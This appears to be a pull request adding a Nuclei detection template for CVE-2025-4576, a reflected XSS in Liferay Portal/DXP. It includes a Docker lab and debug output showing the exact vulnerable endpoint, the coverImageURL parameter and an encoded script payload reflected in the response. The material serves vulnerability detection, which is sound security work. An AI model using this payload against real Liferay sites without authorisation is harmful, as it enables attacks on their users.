### PR TITLE
Add CVE-2025-4576: Liferay Portal/DXP Reflected XSS

### DIFF
--- a/http/cves/2025/CVE-2025-4576.yaml
+++ b/http/cves/2025/CVE-2025-4576.yaml
@@ -21,7 +21,7 @@ info:
   metadata:
     verified: true
     max-request: 1
-  tags: cve,cve2025,xss,reflected,liferay,portal,dxp
+  tags: cve,cve2025,xss,liferay,portal,dxp
 
 http:
   - method: GET
@@ -31,7 +31,7 @@ http:
     matchers:
       - type: dsl
         dsl:
-          - 'status_code == 200'
-          - 'contains(content_type, "text/html")'
           - 'contains_all(body, "<script>alert(document.domain)</script>", "background-image")'
+          - 'contains(content_type, "text/html")'
+          - 'status_code == 200'
         condition: and


### PR DESCRIPTION
### PR Information

- Added CVE-2025-4576: Liferay Portal / DXP Reflected XSS
- References:
  - https://nvd.nist.gov/vuln/detail/CVE-2025-4576
  - https://github.com/advisories/GHSA-6qcg-28jh-hm7r
  - https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-4576

**Note:** PR #15326 for this CVE was closed. Testing confirmed the parameter used in that template (coverImageCaption) is incorrect, the actual vulnerable parameter is coverImageURL.

### Template validation

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)
#### Additional Details

##### Docker lab:
```
version: '3.8'

services:
  liferay-vulnerable:
    image: liferay/portal:7.4.3.132-ga132
    container_name: liferay-vulnerable
    ports:
      - "8080:8080"
    environment:
      - LIFERAY_WEB_PERIOD_SERVER_PERIOD_HOST=liferay-vulnerable
      - LIFERAY_WEB_PERIOD_SERVER_PERIOD_HTTP_PERIOD_PORT=8080
```
Patched version (Liferay Portal 7.4.3.133+) is not available as a public [Docker image](https://hub.docker.com/r/liferay/portal/tags)
 or [GitHub tags](https://github.com/liferay/liferay-portal/tags). 

##### Debug Data:

```bash
# nuclei -t CVE-2025-4576.yaml -target liferay-vulnerable:8080 -debug     

                     __     _
   ____  __  _______/ /__  (_)
  / __ \/ / / / ___/ / _ \/ /
 / / / / /_/ / /__/ /  __/ /
/_/ /_/\__,_/\___/_/\___/_/   v3.4.7

                projectdiscovery.io

[INF] Current nuclei version: v3.4.7 (outdated)
[INF] Current nuclei-templates version: v10.4.0 (latest)
[WRN] Scan results upload to cloud is disabled.
[INF] New templates added in latest release: 94
[INF] Templates loaded for current scan: 1
[WRN] Loading 1 unsigned templates for scan. Use with caution.
[INF] Targets loaded for current scan: 1
[INF] Running httpx on input host
[INF] Found 1 URL from httpx
[INF] [CVE-2025-4576] Dumped HTTP request for http://liferay-vulnerable:8080/o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageURL=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

GET /o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageURL=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E HTTP/1.1
Host: liferay-vulnerable:8080
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

[DBG] [CVE-2025-4576] Dumped HTTP response http://liferay-vulnerable:8080/o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageURL=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E

HTTP/1.1 200 
Connection: close
Content-Length: 194
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 26 Mar 2026 13:52:06 GMT
Set-Cookie: JSESSIONID=81FDB21FA6D4FE0944615534BBAB9955; Path=/; HttpOnly
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN





        <div  class="aspect-ratio aspect-ratio-8-to-3 aspect-ratio-bg-cover cover-image" style="background-image: url("><script>alert(1)</script>);"></div>


[CVE-2025-4576:dsl-1] [http] [medium] http://liferay-vulnerable:8080/o/blogs-web/blogs/entry_cover_image_caption.jsp?coverImageURL=%22%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E
[INF] Scan completed in 531.651164ms. 1 matches found.
# 

```

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
